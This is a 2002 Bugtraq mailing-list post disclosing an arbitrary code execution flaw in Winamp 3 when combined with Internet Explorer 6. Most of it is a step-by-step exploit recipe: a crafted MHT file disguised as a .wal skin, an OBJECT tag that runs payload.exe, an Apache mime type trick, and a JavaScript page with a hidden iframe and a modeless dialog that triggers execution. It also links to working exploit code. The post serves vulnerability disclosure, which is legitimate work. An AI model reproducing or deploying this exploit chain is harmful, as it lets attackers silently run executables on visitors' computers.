RETRY : newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6

["Jelmer" <jelmer () kuperus xs4all nl>]

This one was missed by security focus .
Lets try again

--
  jelmer


----- Original Message -----
From: "Jelmer" <jelmer () kuperus xs4all nl>
To: <bugtraq () securityfocus com>
Sent: Sunday, August 11, 2002 1:28 AM
Subject: newly released winamp 3 fails to address serious "execution of
arbitrary" code issue when combined with MSIE6


> For those of you who have been living under a rock winamp 3 final was
> released today
> It features freeform skins, now plays video's, allows you to manage your
> mp3's and a lot more
>
> Unfortunatly they failed to adress a pretty serious arbitrary code
execution
> vulnerability when combined with
> Internet explorer that I reporteded to them and this list earlier
concerning
> winamp 2. I haven't heard from them since
>
> Winamp 3 uses a new skinning system that uses the .wal extention, this
skin
> type is also
> opened automaticly in MSIE, it doesn't prompt for download and stores the
> file in a known location on the users harddisk namely
>
> C:\Program Files\Winamp3\Skins
>
> (when installed in the default location like most people do)
>
> Working Exploit code is available at http://kuperus.xs4all.nl/winamp3.htm
>
> Note that this version DOES NOT use any unpatched MSIE hole to invoke the
> executable and it will continue to work even after microsoft patches its
> browser
> As i understand it this is just the way the object tag behaves in the
local
> zone. (wich seems very very dangerous to me)
> I also updated the winamp2 exploit code at
> http://kuperus.xs4all.nl/winamp.htm
>
>
>
> Ok to encourrage winamp/aol to take their customers security a bit more
> serious here's "the recipe" to how its
> done.
> It's kind of "http-equivesq" in length and obscurity and may not be for
the
> faint of heart.
>
> Its written from the top of my head, so please forgive me if i missed a
> brace or dot here and there, here goes.
>
> create a directory c:\exploit
> place an exe file in it, lets call it payload.exe
> then create a file called exploit.htm and give it the following contents
>
> <html>
> <body>
> <img src="payload.exe">
> </body>
> </html>
>
> open the file in internet explorer, choose file > save as, and save it as
> exploit.mht
>
> open it in notepad and add the following line to the top <html
> style="display:none;">
>
> so it looks like this :
>
> <html style="display:none;">
> From: <Saved by Microsoft Internet Explorer 5>
> Subject:
> Date: Mon, 5 Aug 2002 18:30:03 +0200
> MIME-Version: 1.0
>
>
> Then look for the body section of this html document (it looks a little
> mangled)
> delete everything between the body tags and place an object tag in its
> place, so it looks like this
>
> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
> <BODY>
> <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal!file:///c:/
> exploit/payload.exe"></OBJECT>
> </BODY></HTML>
>
> this is the code that will later be used to invoke our executable
>
> What we have done is we have slightly altered the mht file so that it can
be
> vieuwed both as html and as mht file.
> files starting with an <html> tag are always seen as html files in
internet
> explorer. (wich can be a pain as will be descibed as followed)
>
> ok we are set to go, now we want to place this on the users harddisk.
> We know wal files are opened automaticly by winamp3 and placed in a known
> location so we'll rename our exploit.mht file to wal
>
> unfortunatly internet explorer disrespects mime types so by having added a
> <html> tag to the mht file it tries top open it as an <html> file
> the only way i found around this is to set the mime type to a value MSIE
> doesn't know. I chose x-foo/x-bar
> If you are using apache you can add the following to your mime.types file
>
> x-foo/x-bar                     wal
>
> this means that the webserver will pass this mime type along with every
file
> requested ending in .wal
>
> when we now request this file it will be opened by winamp3 and an
> errormessage will follow shortly,
> however at that time it is allready too late, our exploit.wal file has
been
> placed in
>
> C:\Program Files\Winamp3\Skins\exploit.wal
>
> now all that remains is  bringing it together by making the following
> sequence of events occur
>
> 1. download our exploit.wal
> 2. wait a few seconds for it to finish downloading then call exploit.wal
as
> html file  (the file also doubles as mht file and the object tag included
in
> the html portion points to itself as the codebase)
>
> here's the code for this
>
> <html>
>
> <body>
>
> Waiting for 5 seconds..
>
> <!-- download our renamed mht file and place it on the users disk -->
> <iframe src="amp.wal" style="display:none"></iframe>
>
> <script language="javascript">
>
> //wait for 5 seconds
>
> setTimeout("ExecuteFile()",5000);
>
>
> function ExecuteFile() {
>
>  // open the saved wal file as html file
>  // oddly when called from disk it didn't open it as html file so we need
to
> force this behaviour by using a modeless dialog
>
>  sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal';
>     sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px;
> dialogheight: 0px; status:no; unadorned:yes; help:no';
>     vReturnValue = window.showModelessDialog(sHTML, '', sFeatures)
> }
>
> </script>
>
> </body>
> </html>
>
>
> have fun
>
> --
>   jelmer